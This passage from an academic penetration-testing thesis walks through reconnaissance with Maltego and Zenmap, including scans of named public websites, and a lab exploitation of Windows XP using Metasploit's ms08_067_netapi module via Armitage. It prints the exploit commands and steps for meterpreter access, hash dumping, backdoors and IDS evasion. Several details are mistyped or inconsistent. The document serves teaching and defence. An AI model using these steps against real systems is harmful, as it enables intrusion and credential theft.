informed decision given a particular situation. Therefore, the tester should possess the necessary
procedures, ethical and technical training to ensure the penetration tests are conducted correctly and
does not lead to a false or misleading sense of security.

84

4.3 INFORMATION OR INTELLIGENCE GATHERING

Information or Intelligence gathering phase is essential to understand the type and amount of
information available before the actual test. Intelligence gathering ranged from passive
information gathering, active information gathering to the targeted scanning of the systems and
network.
In a laboratory network within campus area network, intelligence gathering was carried out by
network surveying, port scanning and operating system (OS) fingerprinting. Nmap was used
extensively because it gives a lot of flexibility in designing targets. Nmap was used to identify
how many host reside within the network and their associated IP address. Hence going by the
propose framework for penetration testing the next aspect to deal with information gathering by
using Maltego software tool for intelligence gathering.

4.3.1 Maltego
Maltego is an active reconnaissance software tool for gathering information where the attacker or
pen-tester action can be trace. This software can be used to gather number programs being run in
the server to be scanned.
Using this tool to gather a number programs being run in the above listed websites;
A. www.ait-open.net

85

Figure 4.2

This is an actual practical safe test which reveals a number of programs running at the
background of the server to achieve its objective. Looking critically at the server many programs
are pointing to the server with arrows hence these programs run at the background of the website
to fulfill the server performance. These are the background programs, meaning that the server is
built with the following technology;

86

Figure 4.3

1. OpenSSL
2. Mod_ssl 2.8.31
3. PHP software
4. OpenSSL 0.9.8
5. Limited Modules
6. GZIP Module
7. Mod_ssl
8. DAV
9. Apache
10. Adobe Active content
11. Unix Operating System
12. Apache 1.3

B. Porta.hopoly.edu.gh

87

Gathering information about Ho Polytechnic school management system (portal.hopoly.edu.gh)


we can realized many programs which have been built with the server to achieve it aim and such
background programs is shown in the figure 4.4 below;

Figure 4.4

The programs comprises the following;

Portal.hopoly.edu.gh (the website)

OpenSSL 0.9.8

OpenSSL

Perl

Win32 Header

Apache 2.2

Mod_ssl

DAV

jQuery

Apache

88

PHP

Last but not the least in terms of many function Maltego has, however, this display shows the
conversion the website to domain, resolving to IP address and links in and out of the website.

Figure 4.5

The IP address for www.ait-open.net is 96.127.151.44 which is an IPV4 address and various
website which form a link inn and out of the website are as follows;

Ait-open.net (as domain)

www.microsoft.com

www.livezilla.net

fonts.googleapis.com

www.oum.edu.my

Capl.oum.edu.my

Egate.oum.edu.my

www2.oum.edu.my

www.purplemathplus.com

89

You can manage the number of websites display in the graph which can generate IP addresses of
the sites, where the site is being Hosted etc.
To conclude, Maltego is good for intelligence gathering, to know general overview of the server
to ascertain the applications being run on the server, the IP address, which location the site is
being hosted and the number of site connected to other sites by API for information sharing
purpose.

4.4

SCANNING AND VULNERABILITY ASSESSMENT

4.4.1 Network Mapper (Nmap)

Service and Network mapping tools are used to analyze systems, networks, services and open
ports. The basic purpose of this tool is to examine firewall rules or responses given on different
real or crafted IP packets
Nmap can be used to scan for what hosts are available on the network, what services the
hosts are offering, what operating systems are running, what packets filters/firewalls are in use
with dozens of other characteristics.
The output from the Nmap is a list of scanned targets with supplemental information on each
depending on the options used. The port table gives the key information. The port table list the
port number and protocol, service name, and state. The state is either open, filtered, closed, or
unfiltered. Open means that services on the target host is listening for connections/packets on
that port. Filtered means that firewall, filter, or other network obstacle is blocking the port that
Nmap cannot tell whether it is open or closed. Closed ports have no application listening to them
though they could open up at any time. Ports are classified when they are responsive to Nmap
probes, but Nmap cannot determine whether they are open or closed.
In this phase, all the gathering information were fine tuned to compliment the scanning and
vulnerability assessment techniques, Normally, both the automated scanner and manual
technique are used but manual techniques requires more time to perfect the scan and identify
vulnerabilities. However, both the automated and manual scanning techniques should be used for
a comprehensive knowledge about the possible vulnerabilities that might have affected the

90

system or network. Suppose, if the system or network to be tested had large network with
hundreds of systems, manual technique would not be an effective and efficient approach.
Zenmap is selected to scan the laboratory network or the targeted hosts. This scanner was
used for identifying what Operating Systems and services running in the targeted hosts, and to
know which host and services were vulnerable. The output generated from the scanners will be
investigated further to verify what possible exploits are possible against the vulnerable hosts and
services in the exploitation and post-exploitation phases using Metasploit framework.

4.4.2 Zenmap

This software tool was used to scan vulnerabilities of the above web servers such as
portal.hopoly.edu.gh. Ait-open.net and local DHCP server on my intranet. These output exposed
a lot of vulnerabilities but not to breech security laws however, local built DHCP server was used
for laboratory testing purposely.
The server in question IP address is 10.27.65.61 and it out come results are as follows;

91

Figure 4.6

92

Figure 4.7

Figure 4.8

Analyzing detail data or information captured from the above figures shows that a host IP
address of 10.27.65.61 was scanned to detect a number of vulnerabilities. Looking closely at
figure 4.7 twenty-two (22) open port was detected or discovered which were;
Discovered open port 5900/tcp on 10.27.65.61
Discovered open port 80/tcp on 10.27.65.61
Discovered open port 135/tcp on 10.27.65.61
Discovered open port 3389/tcp on 10.27.65.61
Discovered open port 139/tcp on 10.27.65.61
Discovered open port 1025/tcp on 10.27.65.61
Discovered open port 445/tcp on 10.27.65.61

93

Discovered open port 53/tcp on 10.27.65.61


Discovered open port 5800/tcp on 10.27.65.61
Discovered open port 1040/tcp on 10.27.65.61
Discovered open port 1047/tcp on 10.27.65.61
Discovered open port 593/tcp on 10.27.65.61
Discovered open port 464/tcp on 10.27.65.61
Discovered open port 1026/tcp on 10.27.65.61
Discovered open port 3268/tcp on 10.27.65.61
Discovered open port 1048/tcp on 10.27.65.61
Discovered open port 1077/tcp on 10.27.65.61
Discovered open port 636/tcp on 10.27.65.61
Discovered open port 389/tcp on 10.27.65.61
Discovered open port 88/tcp on 10.27.65.61
Discovered open port 1028/tcp on 10.27.65.61
Discovered open port 3269/tcp on 10.27.65.61
With these open ports, a hacker can take advantage of these vulnerabilities to compromise your
system. In addition nmap discover window server 2003 version 5.2 operating system being run
on the server, ftpserver as a computer name and a full qualify domain of
ftpserver.hopolycomputerscience.com. This software tool indicate a number of hop to the
destination host where 3 hops was captured.
78.00 ms 192.168.3.1
78.00 ms 172.29.81.254
93.00 ms 10.27.65.61

94

In real world scenario or if the penetration test were to be conducted from outside the network,
ICMP ping scan would not always provide a significant value in intelligence gathering because
many organization. Company normally filters ICMP against their host and networks. Therefore,
port scanning tools and technique were used with different protocol like TCP or UDP to
overcome ICMPs ineffectiveness. However, such scans require a lot of time and the penetration
tester should also be conscious about the penetration testing timeline, but can give valuable
information for further host and service enumeration.
To conclude on Nmap scanning, this tool can be found in hacking or penetration testing
operating systems such as Backtrack, Kali Linux, Blackbuntu were Nmap can be found. It even
has different version of graphical interface which is known as Zenmap which can scan server
being protected by firewall.
For few laboratory test conducted personally, Nmap or Zenmap reveals IP address of the server,
number open ports available, Operating system being run on the system, number of protocols
being used on the system. After gathering these little information, an exploit can be used to
compromise with a system using metasploit and other password cracking tools.

4.5

EXPLOITATION/ATTACK

At this stage, vulnerabilities identified using Nmap is verified to find out whether the
vulnerabilities and loopholes identified during scanning and vulnerability assessment phase
posed any real security threat. This phase acted as verification of potential vulnerabilities and
thus entailed the highest risk within a penetration test. During exploitation phase, vulnerabilities
will be exploited by using publicly available exploits. Metasploit was one of such open source
exploitation framework which was extensively used during this and post-exploitation phase of
the penetration test.
Metasploit is the security framework originally developed in perl by H.D Moore in 2003 and
rewritten in Ruby and acquired by Rapid7 in 2009. It incorporate many aspect of security testing

95

from reconnaissance, exploit development, payload packaging, and delivery of exploits to


vulnerable systems and wraps them into a single application and aid in penetration testing.
Key steps for exploiting a system using the Metasploit Framework can be broken down into the
following steps as;
1. Choose and configure an exploit to be targeted
2. Validate whether the target system is vulnerable to the chosen exploit
3. Select and configure a payload that will be used
4. Choose and configure the encoding schema to make sure that the payload can evade
Intrusion Detection Systems (IDS) with ease.
MSF consist of modules that are combined to affect an exploit. The modules and their specific
functions are as follows:

Exploit: The code fragment that target specific vulnerabilities. Active exploits will exploit a
specific target, run until completed, and then exit. Passive exploits wait for incoming hosts,
such as web browser or FTP clients, and exploit them when they connect.

Payload: These are the malicious code that implement commands immediately following a
successful exploitation.

Auxiliary modules: These modules do not establish or directly support access between the
tester and the target system; instead they perform related functions such as scanning,
fuzzing, or sniffing that support the exploitation phase.

Post modules: following a successful attack, these modules run on compromised targets to
gather useful data and pivot the attacker deeper into the target network.

Encoders: When exploits must bypass antivirus defenses, these modules encode the payload
so that it cannot be detected using signature matching techniques.

No operations (NOPs) : These are used to facilitate buffer overflows during attacks

Kali Linux is the operating system incorporated with many penetration testing tools however,
msfconsole was the command used to launch the metasploit in Kali Linux machine.
The formidable Local Area Network (LAN) laboratory to practically exhibit penetration testing
using Kali Linux as the operating system for the job. This the diagram below

96

KALI LINUX
172.29.81.93/20

PEN - TESTER

172.29.81.254/20

172.29.81.90/20

10.27.65.63/18

172.29.81.2/20

10.27.65.1/18

Figure 4.9

Using zenmap to scan the two host out the three for any vulnerabilities for the business. A
lot of vulnerabilities or information were gathered essentially the script open port
numbers. The first host scan was IP address of 172.29.81.2/20 and 172.29.81.81.90/20
which gave intelligence information about the system for the two figures below;

97

Figure 4.10

98

Figure 4.11

The most important information about the scan is the table below;
PORT

STATE

SERVER
VERSION

139/TCP

445/TCP

2869/TCP

OPEN

OPEN

CLOSE

Netbios-

Microsoft

ssn

Windows XP

Microsoft-

Microsoft

ds

Window XP

icslap

Table 4.12

99

Figure 4.13

Figure 4.14

100

PORT

STATE

SERVER

135/TCP

OPEN

Msrpc

139/TCP

OPEN

Netbios-

VERSION
Microsoft Windows rpc

ssn
445/TCP

OPEN

Microsoft-

Microsoft XP

ds
3389/TCP

OPEN

Ms-wbt-

Microsoft Terminal Service

server

Table 4.15

Now the penetration tester has acquired lots of information about the target system and
network. This information is now used to break into the target system. However, at this point
penetration tester should consider external factors that affect what tools to used and when. This
phase acts as verification of potential vulnerabilities and thus entails the highest risk within a
penetration test so it should be performed with a lot of caution.
All the possible effects need to be carefully considered; all the exploits need to be thoroughly
tested in a controlled environment before performing critical test procedures, such as the
utilization of buffer overflow exploits. Time restriction always exist, forcing the penetration to
make use of the framework as these frameworks help to reduce a lot of time instead of writing
custom exploits. Armitage is one of such graphical open source exploitation metasploit
framework which is very easy to use because of it graphical interface.

4.5.1 PRIVILEGE ESCALATION

After an initial compromise of the target system or network, the penetration tester should look
for ways to increase their access to the system. Suppose it a penetration tester has gained a local
system access, tester should make an effect to carry out further analysis on the target system to

101

gain root privilege. Likewise, if the penetration tester has network access, the tester should sniff
for traffic on the network to see what sensitive information can be obtain. Successful exploitation
of vulnerability does not guarantee a root access, so a tester should make constant attempts to
escalate the privilege and in the process tester might install rootkits or backdoors that assist in
gaining a higher privilege level. The process is called privilege escalation.
Along with vulnerability exploits, social engineering tactics should also be deployed for the
purpose of privilege escalation because social engineering has proven to be an effective way of
obtaining sensitive information about a company and its employees.
At the end of the phase the penetration tester will most likely have an understanding of the
security strength and weaknesses of the target system or network. The penetration test will soon
conclude, and the tester will begin to work on the final report. It is necessary to remember the
actual goal and objective in a penetration test is not only to compromise a system or network, but
it is also to inform and bring awareness to the stakeholders and computer professional specially
network/system administrator, who are associated with the organization as to what vulnerabilities
exist on their system.

4.6

USING ARMITAGE FOR ATTACK

Armitage is frequently overlooked by penetration testers who eschew its Graphical User
Interface (GUI) in favour of the traditional command-line input of the Metasploit console.
However, it possesses Metasploits functionality while giving visibility to its many possible
options, making it a good alternative in complex testing environments. Unlike Metasploit, it also
allows you to test multiple targets as well.
To start Armitage, ensue that the database and Metasploit services are started using
the following command;

Service postgresql start

Service metasploit start

After that step, enter Armitage over the command prompt to execute the command.

102

To discover available targets, you can manually add a host by providing its IP address or select
an nmap scan from the Hosts tab on the menu bar. Armitage can also enumerate targets using
MSF auxiliary commands or DNS enumeration.

4.7 COMPROMISE THE TARGET MACHINE

When Armitage has been launch successful you can discover available target, you can manually
add a host by providing its IP address or select an nmap scan from the Host tab on the menu bar.
Armitage can also enumerate targets using auxiliary commands or DNS enumeration.
After Armitage successful launch, six tab menu listing Armitage, View, Hosts, Attacks,
Workplaces, and Help.
Knowing well that you have enough intelligence information in your reconnaissance stage
therefore, click on;

Hosts

Nmap scan and follow the arrow to click on intense scan

This procedure will enable you enter range of IP address your target machines can be found.
Exhibiting practically, I entered my three target IP addresses which were 172.29.81.2/20,
172,29.81.90/20, 172.29.81.91/20 and 172.29.81.93/20 which displayed those target machines in
the figure below;

103

Figure 4.16

Sometimes nmap scan does not give the actual state of the machines in terms of information
therefore, we need to find out detail target machines information. However, click on the hosts
and follow the arrow to msf scan by highlighting the target machines. With this action it
displayed various IP address and it open ports, msf scan actually exposed the true state of
programs running on those machines.
An IP address of 172.29.81.94 on port 445 was previously running or displayed window xp
but after msf scan was run it revealed to us that window 8.1 was running as the operating system
and on workgroup domain.
An IP address of 172.29.81.2 was running on window xp service pack 2 and IP address of
172.29.81.90 also was running on window xp service pack 3 and the domain name was pearl.
To know a number of services each target machines is running on, click on each of the target
machine and click on services. By applying that on IP addresses of 172.29.81.93/20,
172.29.81.2/20 and 172.29.81.90/20 it displayed the following information in the respective
tables below;

104

SERVICES RUNNING ON 172.29.81.93/20


HOST
IP 172.29.81.93
IP 172.29.81.93
IP 172.29.81.93
IP 172.29.81.93
IP 172.29.81.93

SERVICES
msrpc
netbios-ssn
smb
Http
msrpc

PORT
135
139
445
5357
49152

PROTOCOL
TCP
TCP
TCP
TCP
TCP

INFO
Microsoft Windows RPC
Window 8.1 (build 9600)
Microsoft http API Http2.0 s3 DP/upnp
Microsoft Windows RPC

SERVICES RUNNING ON IP ADDRESS 172.29.81.2/20


HOST
IP 172.29.81.2
IP 172.29.81.2
IP 172.29.81.2

SERVICES
netbios-ssn
smb
ms-wbtserver

PORT PROTOCOL INFO


139 TCP
445 TCP
Window XP service pack 2
3389 TCP

Microsoft Terminal Service

SERVICE RUNNING ON IP ADDRESS 172.29.81.90/20


HOST
IP 172.29.81.90
IP 172.29.81.90
IP 172.29.81.90
IP 172.29.81.90

SERVICES
msrpc
netbios-ssn
smb
ms-wbtserver

PORT
135
139
445

PROTOCOL INFO
TCP
Microsoft Windows RPC
TCP
TCP
Window XP service pack 3

3389 TCP

Microsoft Terminal Service

Table 4.17

Penetration testing is to find vulnerabilities and flaws in a network or systems however, to start the
attack first and foremost, Hail Mary a drop down menu when you click on Attack, this tab allows to
implement blindside attack which will fire everything in the exploit to that said target system or
machine. It is very noisy and can easily cause the target system to crash.

105

Pen-testing is to find flaws in systems therefore let us again find what are the vulnerabilities on the
target machine which bear the IP address of 172.29.81.2/20 therefore click;

Attack then follow the arrow to

Smb and

Check exploits

This displayed a dialogue box indicating that You will see an ATTACK menu attached to each host in
the targets window after highlighting the target machines. When right click on each on the machine
finally this will display or bring out the exploit to be used for your attack.
In windows smb is an operating system program or script that does file sharing while Linux operating
file sharing script is called samba.
After the exploit clicked, a vulnerability target has been realized or displayed on 172.29.81.2 machine
which can be found on the following table.

172.29.81.2 TARGET MACHINE VULNERABITIES


Msf> use windows/smb/ms08_067_netapi
Msf exploit (ms08_067_netapai)> set RHOST 172.29.81.2
RHOST=> 172.29.81.2
Msf exploit (ms08_067_netapi)> check
[+] 172.29.81.2 : 445 The target is vulnerable

Table 4.18

With the revelation of 172.29.81.2 target machine vulnerabilities however, to launch the attack
officially right click the target computer;

Click again Attack

Click smb

Then I finally click ms08_067_netapi, a dialogue box was displayed, click the launch button then
the targeted computer was compromised where in figure 4.19 the compromised system shows up
as an icon with a red border with electrical sparks.

106

Figure 4.19

When the targeted machine was compromised the terminal prompt will change to meterpreter >.
Meterpreter (mete-interpreter) is an advance payload included in the metasploit framework and
this is one of the best payload. With this you can upload/download victims files by going
through the compromised file directory easily. Meterpreter is compatible with most of the exploit
and auxiliary on metersploit and making it the most sophisticated and the most payload pentester or hackers.
This platform allowed developers to write their own extension in the form of shared object
(DLL) files that can be upload and injected into the running process on a target computer after
exploitation has occurred.
Meterpreter and all of the extension that are running are executed entirely from memory and
never touch the hard disk.
In Windows operating system, passwords are being stored in dumb hashes however, you can
download data from dumb hashes and crack them with John the Ripper by following this
procedure after the system has been compromised.

107

Right click target machine

Click meterpreter and follow the arrow to

Access

Dumb Hashes

Isass method or registry method

In hacking pivoted means compromising with a target machine and using that machine to
attack any other machine on the network.

Using Armitage to compromised the target machine and access all directories on 172.29.81.2
target machine follow this procedure;

Right click thecompromised machine

Click on meterpreter

Browse file, then Files 1 will display many directories to access information looking for.

In modern world of hacking and system attacks, attackers are not as concerned are with what can be
done with exploitation as they are with can be done with that access. This is the part of the kill chain
where the attacker achieve the full value of the attack.
Once a system has been compromised, the attacker generally performs the following activities:
Conducts a rapid assessment to characterize the local environment (infrastructure, connect,
accounts, presence of target files, and applications that can facilitate further attacks)
Locate and copies or modifies target files of interest, such as data files (proprietary data and
financial information)
Creates additional account and modifies the system to support post-exploitation activities
Attempts to vertically escalate the privilege level used for access by capturing administrator or
system-level credentials
Attempts to attack other data systems (horizontal escalation) by pivoting the attack through the
compromised system to the remainder of network
Installs persistent backdoors and covert channels to retain control and have secure
communications with the compromised system
Remove indications of the attack from the compromised system

108

4.8 REPORT

Penetration testing is conducted on an agreement with a red team (client) and the customer to
reveal flaws or vulnerability network system has. With this agreement, consensus is reach on the
scope of the test and any flaws found will be captured in the report where such flaws will not be
reveal to any third party.
The flaws found will be work on to maintain a secure system or network. With practical
exhibition conducted where 172,29,81,2 machine was compromised three ports were the
vulnerabilities captured from window xp operating system which are, open port 135, 139 and
445 were revealed however, port 445 which indicate a flaw of ms08_067_netapi as a vulnerable
scripts which needs to be patched.
I used this as a source of a flaw to attack and compromised on 172.29.81.2 where other files
can easily be access. Therefore, it is good that companies which automated their businesses must
one way the other allow RED TEAM to conduct penetration test to enable them seal all
loopholes. In Ghana this IT field is not common therefore, major attention must to be stress on
from IT managers in various firms for safe data keeping.
The report to be written must be describing the detail results of all phases, must also be
prepared along with findings and recommendations for improvements. The report should include
the following items:

109

SAMPLE PENETRATION TEST REPORT

Executive Summary
This section explains the objective behind the penetration test, key results, and
recommended high-level action plans to rectify the risk. The target audience for this are
mainly the non-technical executives so the focus should be on the business risks.

Approach
This section outlines the methodology implemented during the penetration test

Scope
This section explains the scope of the test as well as out of scope items

List of Tools and Techniques


This section briefly describes the tools and techniques used during the penetration test

Findings
This section includes listing of all identified vulnerabilities which are evaluated and
prioritized on the level of risk to business. It also contains detail positive and negative test
findings

Recommendations
This section contains recommendations and actions plans for mitigating vulnerabilities
based on the risk priority

Table 4.20

110

Along with reporting, cleaning up and disposal of artifacts also must be done at this phase. All the
information such as vulnerability reports, exploitation carried out, any backdoors or rootkits if installed
in compromised system must be removed. From the network and system Administrators prospective,
reporting phase serves as reference for optimizing the system or network. This document will include a
list of countermeasures for vulnerabilities which might have affected the system or network due to
improper system patching or improper configuration. The report can also help the network/system
administrator to keep track of the exploit which successfully compromised the system or network.
Hence take corrective measures to avoid such exploitation if real attack or compromise takes place.

CHAPTER 5

DISCUSSION AND CONCLUSION

5.1 ANALYSIS AND DISCUSSION

This chapter sum up the results obtained during the penetration test in a network laboratory, gives a brief
overview of the necessity of having a penetration test methodology and attempts to evaluate whether the
goals and problems statement stated in the first chapter were satisfactorily addressed or not. This
approach eventually leads to discussion about the contributions made by this thesis work and future
work.
Intelligence gathering phase identified the machines that were reachable and the ports open on them,
guessed the OS and service on those reachable machines. Nmap was the primary tool selected for
intelligence gathering phase. Nmap proved to be a versatile tool which scan perform different scans
ranging from ping scan to port scan to OS and services fingerprinting. Initially the Nmap was used to
scan the entire 172.29.81.0/20 network range. This scan successfully identified many but only four
targeted machines which IP addresses were 172.29.81.2/20, 172.29.81.90/20, and 172.29.81.93/20 and
these machines were identified. This result showed that ICMP packets within the network were not

111

blocked and the scan result showed all 1000 ports in identified machines were unfiltered, which meant
no Firewalls or perimeter devices were used to filter the data in the target machines.
Detail Nmap scan shows open ports, closed ports and number of service being run on the machines were
fully captured on Table 4.17 and 4.18 respectively.
The fascinating result obtained from the main target machine when used Armitage tool, the vulnerable
service to compromise the machine was when metasploit was applied which revealed msf> use
window.smb/ms08_067_netpati which indicated that 172.29.81.2 port 445 therefore the target is
vulnerable. Both Window XP and window 8 were running the default installation and no additional
software installed on machines. In laboratory network, both of these vulnerabilities were successfully
exploited using Metasploit Framework using Armitage which is Metesploit Framework graphical
interface as shown in Figure 4.19.
The exploits performed against SMB and IE 8 vulnerabilities proved that such exploitable vulnerabilities
still exist in systems even after their patches were released from Microsoft. The results exhibits that the
value of such penetration testing has proved that such testing are still useful in identifying the weak links
in the network or systems. It can provide Network and System Administrators with a wealth of
information to take corrective measures or counter such vulnerabilities to secure the overall network or
system if performed properly and methodologically.

5.2 REFLECTION ON THE PROPOSAL METHODOLOGY

One of the goal set in this thesis was to identify how penetration testing by law is conducted to
understand, analyzed security issues pertaining to network systems as a whole. In order to achieve this
goal, a penetration testing methodology was proposed section 4.1. Following this methodology,
penetration testing were conducted against the laboratory network. Laboratory network represented the
internal network with few clients and server machines. For network and system Administrators, securing
the network and system in an important task to protect network or system from an outside as well as an
inside attacks. Security measures like firewalls and Intruder Detection System (IDS) help to protect but
such measures are not always sufficient in todays complex environment. A methodological penetration
testing complements such security measures to test if such security measures in place are good enough
or they have some flaws or misconfiguration.

112

The proposed methodology not only presented how network and systems Administrators can utilizes a
penetration test but also understand the flow of test along with each phase. It also showed how free or
open source software can effectively test the networks or systems. These were discussed in literature and
part of methodology chapters and demonstrated how such tools compliments administrators efficiency
at assessing the overall system security. Tools selected in each phase of the proposed methodology were
easy to install and configure, the learning curve to use such tools were minimal and did not require a
high end hardware to setup configuration penetration test.
The objective of reconnaissance or information gathering phase was initially to map the network,
discover the reachable machines, and determine open ports, services and operating systems within the
entire network segment. The objective of scanning and vulnerability assessment phase was to enumerate
further and make use of the automation
Scanners enhance the scanning and assessment and discover the extra information which might have
missed during reconnaissance gathering phase. The results or reports analysis from reconnaissance phase
can provide a deeper insight about the network or system.
However, such analysis helped further to find out what are the real flaws whether it was a faulty
configuration or unpatched systems. The penetration testing methodology was successful at achieving
objective set in scanning and vulnerability assessment phase. From the pen-tester prospective, one can
argue, should the tester spend additional time performing such penetration testing? Results drawn from
this thesis showed that penetration testing had a value of performed in a systematic and methodological
manner. Penetration testing is something that network and system Administrators had to live without
because of all the other activities they perform harden the system.

5.3 CONTRIBUTION

Network administrators should be skillful to perform penetration testing to know flaws their network
systems have. Not all network/system administrators can afford to purchase the commercial tools to
perform penetration test. Specially, the administrator who works in medium or small organization, there
will not always be a separate budget allocation to purchase or hire third party professional to perform
penetration tests. In such a situation this thesis work can provide baseline information with all the tools

113

and methodology. Any Administrator can easily replicate the same or similar penetration environment.
However, depending upon the scope can be broaden.
At present, mostly network/system administrators defend their network or systems using firewalls to
block unidentified or malicious traffic, Intruder Detection System (IDS) to detect and respond to attacks,
anti-virus and anti-malware programs to alert users about malicious software however, the goal to
defend the system or network from malicious users and intrusion attempts. All those measures are
protective and preventive in nature, which can either succeed or fail on the time they are released and
current evolutions in technology. However, security should not only include prevention and protection
but also prediction and response.
This Thesis also presented a prediction and response model where phases like intelligence gathering and
scanning and vulnerability assessment can be used to predict the network or system while phases like
Exploitation and reporting for response required to countermeasure the threat and loopholes. After
certain time, certain vulnerability or attack becomes obsolete, but the knowledge on the software
responded to an attack of that extent, can help in identifying similar behaviors in the future.

5.4 FUTURE WORK

This work can be extended in different directions;

Automation of the entire proposed penetration testing methodology to build a complete security
testing solution can be an extension of this thesis of work. This extension can empower the
network and system administrators of small and medium scale organization to test and measure
IT assets without any hassles.

This thesis can be extended to increase the efficiency if human factor is also considered during a
penetration testing. The focus of this thesis was on finding and exploring the vulnerabilities
related to computer networks. However, employees within the organization are the weakest link
in security. So effort can be made by integrating social engineering tools and techniques into the
existing penetration testing methodology.

Computer users in organization need to be train to know the techniques hackers use in
reconnaissance.

114

5.5

CONCLUSION

After going through a deep study of penetration testing framework and analyzing the various
tools used, we have reach to a point of conclusion that:

Penetration testing provides the organization a snapshot of the overall security of the
network infrastructure.

A penetration testing process should be carried out in a proper manner and methodology.
Proper planning and analysis phase should be taken most seriously as all done after it
relies on this phase only.

Metasploit/ Armitage Framework is the best among all other commercial and open source
exploitation tools. Integrating Metasploit with various tools like nessus, nmap and other
third tools make it very efficient. Various extensions, command are there in Metasploit or
Armitage framework which can be used for Post Exploitation.

An automated Penetration Testing Framework integrated with various third party tools
works much faster than manual testing framework.

This thesis explored and investigated the various network penetration testing tools and
methodologies. The main results are as follows;

Design and developed the enhance framework of network penetration testing over the
laboratory personally built. This framework tries to find out the loopholes and
vulnerabilities in the network and exploit them before attackers. Hence provide an
assurance of secure network.

Demonstrated the use of penetration testing over campus network by avoiding


unnecessary expenditure of professional testers as they also follow same tools and
techniques and their unreliable nature.

The success of any penetration test depends on the underlying methodology. In order to perform
successful penetration test, the underlying methodology should also make use of different
security tools. One of the goal set in this thesis was to examine different security tools and
techniques. Different tools like Nmap. Nessus, Armitage and Metesploit Framework were
introduced first and examined. The selection of the tools were based on its versatility, usability

115

and effectiveness. With all the tools in hand, each phase of the methodology were carried out in a
systematic and methodological manner. The selected tools were divided into three categories.
The reconnaissance or intelligence gathering phase covered the tools which assisted in network
profiling, network scanning and operating and service fingerprinting. Nmap was identified as one
of the best tool during this phase. Scanning and Vulnerability Assessment phase covered the
tools which
allowed the exploration of network and system vulnerabilities. Metasploit framework or
Armitage was more than a tool, it was complete penetration testing framework, but it can also be
used as a tool during exploration and post-exploitation phases due to its abundance of arbitrary
exploits, usability and effectiveness. However, the best and most powerful tool a penetration
tester can have is a Brain because penetration testing is not always about tool. Tools and
techniques can just be a matter of choice and expertise.
In conclusion, tools and methodology, if properly utilized can prove their usefulness for
understanding the weaknesses of the network or systems and how they might be exploited.
Penetration testing is not an alternative to other security measures. In fact, it should be used to
complement the defense in depth principle.
In todays world of information security, where threats and vulnerabilities are changing and
evolving, penetration testing tools and methods used to combat against such threats and
vulnerabilities should also change and evolve along with technological advancement.

5.6

REFERENCE

1. Security information concerning the study of Maltego: www.searchsecurity.techtarget.in


2. Operating system hacking and security in-line with Dmitry: www.operatin5.blogspot.be
3. Detail study of jidsaw tool: www.threatpost.com/improved-jigsaw-hacking-tool-spotted-inattacks/102016

116

4. Fierce-ph tool study; www.hackersgarage.com


5. Fping data collection tool study; www.irongeek.com
6. Dnsdict6 tool for penetration and hacking; www.hackingtools.com/dnsdict-hack-tool-tutorialknown-your backtract-hackingloops/
7. Information about Nmap: www.resources.infosecinstitute.com
8. Kismet hacking tool: www.ehacking.net/2011/051/kismetwireless.net/documentation.html
9. Wireshark tool tutorial:www.concise-course.com/security/wireshark-basics/
10. Burpsuite hacking tool: www.securityninja.co.uk/application-security/burp-suite-tutorialintruder-tool-version
11. Nikte: null-byte.wonderhowto.com/how-to/hack-like-pro-find-vulnerabilities-for-any-websiteusing-nikte-0151729 & www.tecmint.com
12. OpenVAS information gathering tool: sathisharthars.wordpress.com
13. Cisco-Global Exploiter- www.toolwar.com/2014/02/cisco-global-exploiter-cge-tools.html
14. Yersima hacking tool: mynatsatety.com/2011/11/yersima-how-to-analyzey-and-testing.html
15. THC-Hydra ishackers.blogspot.com/p/the-hydra.html
16. John the Ripper password hacking tool:www.binorytides.com/cracking-linux-password-withjohn-the-ripper-tutorial/
17. Metasploit study guide: www.ehacking.net/2011/10/metasploit-basic-command-tutotial.html
18. Browser Exploitation Framework (BeEF)- tipstrictshack.blogspot.com
19. Rootkit for hiding information after hack etc: nrupentheking.blogspot.com/2011/03/rootkitrevealed.html

117

118